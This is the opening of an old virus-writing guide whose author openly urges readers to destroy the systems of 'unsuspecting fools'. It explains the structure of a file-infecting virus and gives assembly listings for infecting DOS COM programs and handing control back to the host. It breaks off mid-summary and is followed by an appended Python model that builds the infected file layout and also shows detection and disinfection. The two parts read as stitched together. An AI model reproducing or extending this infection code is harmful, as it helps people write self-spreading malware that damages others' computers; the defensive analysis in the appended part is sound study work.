dark angel's phunky virus writing guide.txt
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
DISCLAIMER: The author hereby disclaims himself
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
DEDICATION: This was written to make the lives of scum such as Patty
Hoffman, John McAffee, and Ross Greenberg a living hell.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
OTHER STUFF: Thanks go to The Shade of Sorrow, Demogorgon, and Orion Rouge
on their comments (which I occasionally listened to!).  Thanks also to
Hellraiser, who gave me an example of some virus source code (his own, of
course).
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Dark Angel's Phunky Virus Writing Guide
---- ------- ------ ----- ------- -----

Virii are wondrous creations written for the sole purpose of spreading and
destroying the systems of unsuspecting fools.  This eliminates the systems
of simpletons who can't tell that there is a problem when a 100 byte file
suddenly blossoms into a 1,000 byte file.  Duh.  These low-lifes do not
deserve to exist, so it is our sacred duty to wipe their hard drives off
the face of the Earth.  It is a simple matter of speeding along survival of
the fittest.

Why did I create this guide?  After writing several virii, I have noticed
that virus writers generally learn how to write virii either on their own
or by examining the disassembled code of other virii.  There is an
incredible lack of information on the subject.  Even books published by
morons such as Burger are, at best, sketchy on how to create a virus.  This
guide will show you what it takes to write a virus and also will give you a
plethora of source code to include in your own virii.

Virus writing is not as hard as you might first imagine.  To write an
effective virus, however, you *must* know assembly language.  Short,
compact code is a hallmark of assembly language, and that is a desirable
characteristic of virii.  However, it is *not* necessary to write in pure
assembly.  C may also be used, as it allows almost total control of the
system while generating relatively compact code (if you stay away from the
library functions).  You still must access the interrupts, though, so
assembly knowledge is still required.  It is still best to stick with pure
assembly, since most operations are more easily coded in assembly.  If you
do not know assembly, I would recommend picking up a copy of The Microsoft
Macro Assembler Bible (Nabajyoti Barkakati, ISBN #: 0-672-22659-6).  It is
an easy-to-follow book covering assembly in great detail.  Also get
yourself a copy of Undocumented DOS (Schulman, et al, ISBN #
0-201-57064-5), as it is very helpful.

The question of which compiler to use arises often.  I suggest using
Borland Turbo Assembler and/or Borland C++.  I do not have a copy of
Zortech C (it was too large to download), but I would suspect that it is
also a good choice.  Stay away from Microsoft compilers, as they are
neither as flexible nor as efficient as those of other vendors.

A few more items round out the list of tools helpful in constructing virii.
The latest version of Norton Utilities is one of the most powerful programs
available, and is immeasurably helpful.  MAKE SURE YOU HAVE A COPY!  You
can find it on any decent board.  It can be used during every step of the
process, from the writing to the testing.  A good debugger helps.  Memory
management utilities such as MAPMEM, PMAP, and MARK/RELEASE are
invaluable, especially when coding TSR virii.  Sourcer, the commenting
disassembler, is useful when you wish to examine the code of other virii
(this is a good place to get ideas/techniques for your virus).

Now that you have your tools, you are ready to create a work of art
designed to smash the systems of cretins.  There are three types of virii:

  1) Tiny virii (under 500 bytes) which are designed to be undetectable
     due to their small size.  TINY is one such virus.  They are generally
     very simple because their code length is so limited.

  2) Large virii (over 1,500 bytes) which are designed to be undetectable
     because they cover their tracks very well (all that code DOES have a
     use!).  The best example of this is the Whale virus, which is perhaps
     the best 'Stealth' virus in existence.

  3) Other virii which are not designed to be hidden at all (the writers
     don't give a shit).  The common virus is like this.  All overwriting
     virii are in this category.

You must decide which kind of virus you wish to write.  I will mostly be
discussing the second type (Stealth virii).  However, many of the
techniques described may be easily applied to the first type (tiny virii),
although tiny virii generally do not have many of the "features" of larger
virii, such as directory traversal.  The third type is more of a
replicating trojan-type, and will warrant a brief (very, very brief!)
discussion later.

A virus may be divided into three parts: the replicator, the concealer, and
the bomb.  The replicator part controls the spread of the virus to other
files, the concealer keeps the virus from being detected, and the bomb only
executes when the activation conditions of the virus (more on that later)
are satisfied.

-=-=-=-=-=-=-=-
THE REPLICATOR
-=-=-=-=-=-=-=-

The job of the replicator is to spread the virus throughout the system of
the clod who has caught the virus.  How does it do this without destroying
the file it infects?  The easiest type of replicator infects COM files.  It
first saves the first few bytes of the infected file.  It then copies a
small portion of its code to the beginning of the file, and the rest to the
end.
  +----------------+        +------------+
  |   P1   |  P2   |        |  V1  |  V2 |
  +----------------+        +------------+
  The uninfected file        The virus code

In the diagram, P1 is part 1 of the file, P2 is part 2 of the file, and V1
and V2 are parts 1 and 2 of the virus.  Note that the size of P1 should be
the same as the size of V1, but the size of P2 doesn't necessarily have to
be the same size as V2.  The virus first saves P1 and copies it to either
1) the end of the file or 2) inside the code of the virus.  Let's assume it
copies the code to the end of the file.  The file now looks like:

  +---------------------+
  |   P1   |  P2   | P1 |
  +---------------------+

Then, the virus copies the first part of itself to the beginning of the
file.

  +---------------------+
  |   V1   |  P2   | P1 |
  +---------------------+

Finally, the virus copies the second part of itself to the end of the file.
The final, infected file looks like this:

  +-----------------------------+
  |   V1   |  P2   | P1 |  V2  |
  +-----------------------------+

The question is: What the fuck do V1 and V2 do?  V1 transfers control of
the program to V2.  The code to do this is simple.

          JMP  WORD PTR [Duh]     ; Near jump through the word at Duh
                                  ; (FFh 26h + 16-bit address): four bytes
  Duh     DW   V2_Start           ; Takes two bytes

Duh holds the offset of the first instruction of V2 within the code
segment.  A COM program starts with CS = DS = ES = SS, so a near jump
through a 16-bit offset is enough; no segment needs to be stored.  Note
that the value of Duh must be changed to reflect the length of the file
that is infected.  For example, if the original size of the program is 79
bytes, Duh must be changed so that the instruction at CS:[155h] is
executed.  The value of Duh is obtained by adding the length of V1, the
original size of the infected file, and 256 (to account for the PSP).  In
this case, V1 = 6 and P1 + P2 = 79, so 6 + 79 + 256 = 341 decimal (155
hex).

An alternate, albeit more difficult to understand, method follows:

          DB   11101001b          ; E9h, the code for JMP (2-byte displacement)
  Duh     DW   V2_Start - OFFSET Duh - 2   ; 2-byte displacement

This inserts the jump offset directly into the code following the jump
instruction.  The displacement of an E9h jump is counted from the end of
the instruction, i.e. from the byte after the displacement word, which is
why 2 is subtracted.  You could also replace the second line with
DW V2_Start - $ - 2, which accomplishes the same task.  This form of V1 is
only three bytes long, so P1 shrinks to three bytes as well, and the
displacement still has to be recomputed for every file infected.

V2 contains the rest of the code, i.e. the stuff that does everything else.
The last part of V2 copies P1 over V1 (in memory, not on disk) and then
transfers control to the beginning of the file (in memory).  The original
program will then run happily as if nothing happened.  The code to do this
is also very simple.

          MOV  SI, V2_START       ; V2_START is a LABEL marking where V2 starts
          SUB  SI, V1_LENGTH      ; Go back to where P1 is stored
          MOV  DI, 0100h          ; All COM files are loaded @ CS:[100h] in memory
          MOV  CX, V1_LENGTH      ; Move CX bytes
          REP  MOVSB              ; DS:[SI] -> ES:[DI]
          MOV  DI, 0100h
          JMP  DI

This code assumes that P1 is located just before V2, as in:

  P1_Stored_Here:
          .
          .
          .
  V2_Start:

It also assumes ES equals CS.  If these assumptions are false, change the
code accordingly.  Here is an example:

          PUSH CS                 ; Store CS
          POP  ES                 ; and move it to ES
                                  ; Note MOV ES, CS is not a valid instruction
          MOV  SI, P1_START       ; Move from wherever P1 is stored
          MOV  DI, 0100h          ; to CS:[100h]
          MOV  CX, V1_LENGTH
          REP  MOVSB
          MOV  DI, 0100h
          JMP  DI

This code first moves CS into ES and then sets the source pointer of MOVSB
to where P1 is located.  Remember that this is all taking place in memory,
so you need the OFFSET of P1, not just the physical location in the file.
The offset of P1 is 100h higher than the physical file location, as COM
files are loaded starting from CS:[100h].

One caveat: labels such as V2_START and P1_START are the offsets the virus
had when it was assembled, but V2 lands at a different offset in every host
(100h + the length of V1 + the host's original size).  A working replicator
therefore has to work out at run time how far it has been moved from its
assembled position and add that difference to SI and to every other
reference to its own data; the listings above leave that out to keep the
copy loop clear.

So here's a summary of the parts of the virus and location labels:

  V1_Start:
          JMP  WORD PTR [Duh]
  Duh     DW   V2_Start
  V1_End:

  P2_Start:
  P2_End:

  P1_Start:                       ; First part of the program stored here for future use
  P1_End:

  V2_Start:
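The layout and the two jump forms above, together with the in-memory restore that V2 performs, as a byte-level model in Python.  This is an added example, not code from Dark Angel's guide: the 79-byte host and the virus body are constructed placeholder byte strings, nothing is written to disk or executed, and it goes slightly beyond the text by also showing the two things a defender does with the same arithmetic, following the entry jump to find the virus body and rebuilding the original [P1|P2] from an infected file.  The names (make_v1, infect, entry_target, restore_in_memory, disinfect) are this example's own.

```python
"""Byte-level model of the COM infection layout [V1|P2|P1|V2].

Everything here is constructed for illustration: the host and the virus
body V2 are placeholder byte strings, not real programs.  Two forms of V1
are modelled:
  "indirect": JMP WORD PTR [Duh] + Duh DW target   (6 bytes, first method)
  "rel16":    E9h + 16-bit displacement            (3 bytes, alternate method)
"""
import struct

PSP_SIZE = 0x100            # a COM image is loaded at CS:0100h, right after the PSP
OP_JMP_REL16 = b"\xe9"      # JMP rel16: target = IP of the next instruction + rel16
OP_JMP_IND = b"\xff\x26"    # JMP WORD PTR [addr16]: target = word stored at DS:[addr16]
V1_LEN = {"indirect": 6, "rel16": 3}


def make_v1(method, v2_file_offset):
    """Build V1 so that it transfers control to V2.

    v2_file_offset is where V2 begins in the infected file; in memory the
    same bytes sit at PSP_SIZE + v2_file_offset.
    """
    target_ip = PSP_SIZE + v2_file_offset
    if method == "rel16":
        # The displacement is counted from the end of the 3-byte instruction,
        # which is why the assembler form is "V2_Start - OFFSET Duh - 2".
        rel = (target_ip - (PSP_SIZE + 3)) & 0xFFFF
        return OP_JMP_REL16 + struct.pack("<H", rel)
    if method == "indirect":
        # The pointer word (Duh) follows the 4-byte instruction, so with V1 at
        # 0100h it always lives at 0104h; only its contents change per host.
        duh_addr = PSP_SIZE + 4
        return OP_JMP_IND + struct.pack("<H", duh_addr) + struct.pack("<H", target_ip)
    raise ValueError(f"unknown V1 method {method!r}")


def infect(host, v2, method="indirect"):
    """[P1|P2] + [V1|V2] -> [V1|P2|P1|V2], with len(P1) == len(V1)."""
    n = V1_LEN[method]
    if len(host) < n:
        raise ValueError("host too small to hold V1")
    p1, p2 = host[:n], host[n:]
    v2_file_offset = n + len(host)          # V1 + P2 + P1 = len(V1) + original size
    infected = make_v1(method, v2_file_offset) + p2 + p1 + v2
    # The PSP plus the whole image must still fit in one 64 KiB segment.
    if PSP_SIZE + len(infected) > 0xFFFF:
        raise ValueError("infected image would not fit in a COM segment")
    return infected


def entry_target(image):
    """Decode the first instruction of a COM image and return the IP it
    jumps to, or None if it is not one of the two forms above.  This is
    the decode a scanner does to follow the entry jump to the virus body."""
    if image[:1] == OP_JMP_REL16 and len(image) >= 3:
        rel = struct.unpack("<H", image[1:3])[0]
        return (PSP_SIZE + 3 + rel) & 0xFFFF
    if image[:2] == OP_JMP_IND and len(image) >= 6:
        addr = struct.unpack("<H", image[2:4])[0]
        off = addr - PSP_SIZE               # memory address -> file offset
        if 0 <= off <= len(image) - 2:
            return struct.unpack("<H", image[off:off + 2])[0]
    return None


def restore_in_memory(image, method, v2_len):
    """What the tail of V2 does at run time: copy the saved P1 over V1 in
    the loaded image so that the original program starts at 0100h."""
    n = V1_LEN[method]
    v2_start = len(image) - v2_len
    p1 = image[v2_start - n:v2_start]       # P1 is stored just before V2
    return p1 + image[n:]


def disinfect(image, method, v2_len):
    """What a cleaner does on disk: rebuild [P1|P2] from [V1|P2|P1|V2]."""
    n = V1_LEN[method]
    v2_start = len(image) - v2_len
    p1 = image[v2_start - n:v2_start]
    p2 = image[n:v2_start - n]
    return p1 + p2


if __name__ == "__main__":
    host = bytes(range(79))     # constructed 79-byte host, the text's worked example
    v2 = b"\x90" * 40           # constructed placeholder for the virus body
    for method in ("indirect", "rel16"):
        inf = infect(host, v2, method)
        print(method, "entry ->", hex(entry_target(inf)),
              "restore ok:", restore_in_memory(inf, method, len(v2))[:len(host)] == host,
              "clean ok:", disinfect(inf, method, len(v2)) == host)
```

With the 79-byte host the indirect form lands on 155h exactly as computed in the text, and the rel16 form lands on 152h (100h + 3 + 79) with a displacement equal to the host's original size.  Note that restore_in_memory and disinfect only need the lengths of V1 and V2, which is why a fixed-layout prepender like this is straightforward to clean once the virus body has been identified.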